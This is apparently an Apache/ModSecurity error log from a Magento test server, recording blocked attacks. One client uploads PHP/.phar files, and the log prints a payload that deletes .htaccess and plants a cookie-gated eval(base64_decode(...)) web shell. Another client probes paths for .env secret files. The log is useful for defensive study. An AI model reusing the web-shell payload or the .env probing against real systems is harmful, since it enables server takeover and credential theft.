[Wed Dec 17 19:59:35.647203 2025] [:error] [pid 791341] [client 91.84.106.190:58600] [client 91.84.106.190] ModSecurity: Rule 7f3738132be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/3/8/3888364f428d25.phar"] [unique_id "aUL9l3c0plye2QvsYSzDGQAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 17 19:59:35.647674 2025] [:error] [pid 791341] [client 91.84.106.190:58600] [client 91.84.106.190] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/3/8/3888364f428d25.phar"] [unique_id "aUL9l3c0plye2QvsYSzDGQAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 17 19:59:35.650079 2025] [:error] [pid 791341] [client 91.84.106.190:58600] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/3/8/3888364f428d25.phar"] [unique_id "aUL9l3c0plye2QvsYSzDGQAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 17 19:59:35.650245 2025] [:error] [pid 791341] [client 91.84.106.190:58600] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/3/8/3888364f428d25.phar"] [unique_id "aUL9l3c0plye2QvsYSzDGQAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 17 19:59:35.828049 2025] [:error] [pid 791341] [client 91.84.106.190:58600] [client 91.84.106.190] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 3888364f428d25.php8 found within FILES:custom_attributes[country_id]: 3888364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUL9l3c0plye2QvsYSzDGgAAAAU"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/3/8/3888364f428d25.phar
[Wed Dec 17 19:59:35.828644 2025] [:error] [pid 791341] [client 91.84.106.190:58600] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUL9l3c0plye2QvsYSzDGgAAAAU"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/3/8/3888364f428d25.phar
[Wed Dec 17 19:59:35.828833 2025] [:error] [pid 791341] [client 91.84.106.190:58600] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUL9l3c0plye2QvsYSzDGgAAAAU"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/3/8/3888364f428d25.phar
[Wed Dec 17 19:59:37.974663 2025] [:error] [pid 791341] [client 91.84.106.190:58600] [client 91.84.106.190] ModSecurity: Rule 7f3738132be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/3/8/3888364f428d25.php8"] [unique_id "aUL9mXc0plye2QvsYSzDGwAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 17 19:59:37.975133 2025] [:error] [pid 791341] [client 91.84.106.190:58600] [client 91.84.106.190] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/3/8/3888364f428d25.php8"] [unique_id "aUL9mXc0plye2QvsYSzDGwAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 17 19:59:37.977424 2025] [:error] [pid 791341] [client 91.84.106.190:58600] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/3/8/3888364f428d25.php8"] [unique_id "aUL9mXc0plye2QvsYSzDGwAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 17 19:59:37.977611 2025] [:error] [pid 791341] [client 91.84.106.190:58600] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/3/8/3888364f428d25.php8"] [unique_id "aUL9mXc0plye2QvsYSzDGwAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 18 01:51:03.660838 2025] [:error] [pid 810596] [client 45.148.10.143:34880] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUNP98XpSNGAf7L9MnbVkQAAAAQ"]
[Thu Dec 18 01:51:03.661052 2025] [:error] [pid 810596] [client 45.148.10.143:34880] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUNP98XpSNGAf7L9MnbVkQAAAAQ"]
[Thu Dec 18 01:51:03.661202 2025] [:error] [pid 810596] [client 45.148.10.143:34880] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUNP98XpSNGAf7L9MnbVkQAAAAQ"]
[Thu Dec 18 01:51:22.134142 2025] [:error] [pid 810594] [client 45.148.10.143:38872] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aUNQCttunAtRebcefOLdYQAAAAI"]
[Thu Dec 18 01:51:22.134400 2025] [:error] [pid 810594] [client 45.148.10.143:38872] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aUNQCttunAtRebcefOLdYQAAAAI"]
[Thu Dec 18 01:51:22.134593 2025] [:error] [pid 810594] [client 45.148.10.143:38872] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aUNQCttunAtRebcefOLdYQAAAAI"]
[Thu Dec 18 01:51:27.115263 2025] [:error] [pid 810593] [client 45.148.10.143:38874] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aUNQD1XYVi-cYqymYgYAnAAAAAE"]
[Thu Dec 18 01:51:27.115494 2025] [:error] [pid 810593] [client 45.148.10.143:38874] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aUNQD1XYVi-cYqymYgYAnAAAAAE"]
[Thu Dec 18 01:51:27.115668 2025] [:error] [pid 810593] [client 45.148.10.143:38874] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aUNQD1XYVi-cYqymYgYAnAAAAAE"]
[Thu Dec 18 01:51:38.350323 2025] [:error] [pid 810595] [client 45.148.10.143:40776] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /env/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aUNQGoVQR0ZCxazVD9krwwAAAAM"]
[Thu Dec 18 01:51:38.350571 2025] [:error] [pid 810595] [client 45.148.10.143:40776] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aUNQGoVQR0ZCxazVD9krwwAAAAM"]
[Thu Dec 18 01:51:38.350768 2025] [:error] [pid 810595] [client 45.148.10.143:40776] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aUNQGoVQR0ZCxazVD9krwwAAAAM"]
[Thu Dec 18 01:51:41.573966 2025] [:error] [pid 810596] [client 45.148.10.143:54910] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /env/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aUNQHcXpSNGAf7L9MnbVkwAAAAQ"]
[Thu Dec 18 01:51:41.574192 2025] [:error] [pid 810596] [client 45.148.10.143:54910] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aUNQHcXpSNGAf7L9MnbVkwAAAAQ"]
[Thu Dec 18 01:51:41.574395 2025] [:error] [pid 810596] [client 45.148.10.143:54910] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aUNQHcXpSNGAf7L9MnbVkwAAAAQ"]
[Thu Dec 18 01:51:41.683336 2025] [:error] [pid 810596] [client 45.148.10.143:54910] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aUNQHcXpSNGAf7L9MnbVlAAAAAQ"]
[Thu Dec 18 01:51:41.683550 2025] [:error] [pid 810596] [client 45.148.10.143:54910] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aUNQHcXpSNGAf7L9MnbVlAAAAAQ"]
[Thu Dec 18 01:51:41.683702 2025] [:error] [pid 810596] [client 45.148.10.143:54910] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aUNQHcXpSNGAf7L9MnbVlAAAAAQ"]
[Thu Dec 18 01:51:41.776120 2025] [authz_core:error] [pid 810596] [client 45.148.10.143:54910] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Thu Dec 18 01:51:42.023211 2025] [authz_core:error] [pid 810592] [client 45.148.10.143:54924] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Thu Dec 18 01:51:42.105798 2025] [:error] [pid 810592] [client 45.148.10.143:54924] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aUNQHl2-pzy_XbcfFWNUagAAAAA"]
[Thu Dec 18 01:51:42.106016 2025] [:error] [pid 810592] [client 45.148.10.143:54924] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aUNQHl2-pzy_XbcfFWNUagAAAAA"]
[Thu Dec 18 01:51:42.106166 2025] [:error] [pid 810592] [client 45.148.10.143:54924] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aUNQHl2-pzy_XbcfFWNUagAAAAA"]
[Thu Dec 18 01:51:49.115497 2025] [:error] [pid 810594] [client 45.148.10.143:54940] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aUNQJdtunAtRebcefOLdYgAAAAI"]
[Thu Dec 18 01:51:49.117645 2025] [:error] [pid 810594] [client 45.148.10.143:54940] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aUNQJdtunAtRebcefOLdYgAAAAI"]
[Thu Dec 18 01:51:49.117818 2025] [:error] [pid 810594] [client 45.148.10.143:54940] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aUNQJdtunAtRebcefOLdYgAAAAI"]
[Thu Dec 18 01:52:05.715174 2025] [:error] [pid 810993] [client 45.148.10.143:38638] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aUNQNYUzQOIP6NNaX_tE9AAAAAY"]
[Thu Dec 18 01:52:05.715484 2025] [:error] [pid 810993] [client 45.148.10.143:38638] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aUNQNYUzQOIP6NNaX_tE9AAAAAY"]
